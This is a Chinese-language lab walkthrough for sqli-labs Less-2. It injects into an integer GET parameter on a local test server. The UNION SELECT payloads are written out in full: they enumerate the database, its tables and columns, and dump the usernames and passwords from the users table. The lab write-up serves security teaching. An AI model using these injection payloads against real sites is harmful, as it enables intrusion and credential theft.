Less-2(GET整型)
unkilledsky 202 0

输入地址:http://192.168.193.129/sqlilabs/Less-2/

(1)根据题意利用GET传入一个id参数这里传入id=1,发现有数据回显

Less-2(GET整型)

(2)传入id=1’,结果报错,存在注入

Less-2(GET整型)

(3)传入id=1’ and 1=1 %23,依然报错,传入id=1 and 1=1 %23则不报错,正常回显数据,由此判断,此题为整型注入

Less-2(GET整型) Less-2(GET整型)

(4)利用order by查出字段数为3

http://192.168.193.129/sqlilabs/Less-2/?id=1 order by 3 %23

Less-2(GET整型)

(5)根据上题,利用union select联合查询,爆库,爆表,爆字段

判断回显:id=0 union select 1,2,3 %23

Less-2(GET整型)

查询当前数据库:id=0 union select 1,database(),3 %23

Less-2(GET整型) 查询表:

id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' %23

Less-2(GET整型) 查询users表字段:

id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23

Less-2(GET整型) 查询users表里的数据:

id=0 union select 1,group_concat(username),group_concat(password) from security.users %23

Less-2(GET整型)

评论区

索引目录